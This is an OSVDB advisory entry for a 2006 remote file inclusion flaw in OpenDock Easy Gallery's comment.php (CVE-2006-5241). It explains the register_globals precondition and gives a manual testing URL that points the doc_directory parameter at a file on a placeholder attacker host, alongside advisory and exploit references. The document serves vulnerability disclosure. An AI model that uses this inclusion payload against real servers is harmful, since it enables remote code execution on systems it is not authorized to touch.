OpenDock Easy Gallery sw/lib_comment/comment.php doc_directory Variable Remote File Inclusion

2006-10-09T07:50:00
ID OSVDB:29596
Type osvdb
Reporter Dedi Dwianto(the_day@echo.or.id)
Modified 2006-10-09T07:50:00

Description

Technical Description

This vulnerability is only present when the register_globals PHP option is set to 'on'. This has not been the default setting for PHP installs since version 4.2.0 (22-Apr-2002).

Manual Testing Notes

http://[target]/[path]/sw/lib_comment/comment.php?doc_directory=http://[attacker]/inject.txt?

References:

Vendor URL: http://web.opendock.net/ Security Tracker: 1017021 Secunia Advisory ID:22337 Related OSVDB ID: 29589 Related OSVDB ID: 29591 Related OSVDB ID: 29597 Related OSVDB ID: 29592 Related OSVDB ID: 29593 Related OSVDB ID: 29595 Related OSVDB ID: 29590 Related OSVDB ID: 29594 Other Advisory URL: http://advisories.echo.or.id/adv/adv52-theday-2006.txt Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-10/0123.html Keyword: ECHO_ADV_52$2006 ISS X-Force ID: 29417 Generic Exploit URL: http://www.milw0rm.com/exploits/2497 FrSIRT Advisory: ADV-2006-3969 CVE-2006-5241 Bugtraq ID: 20411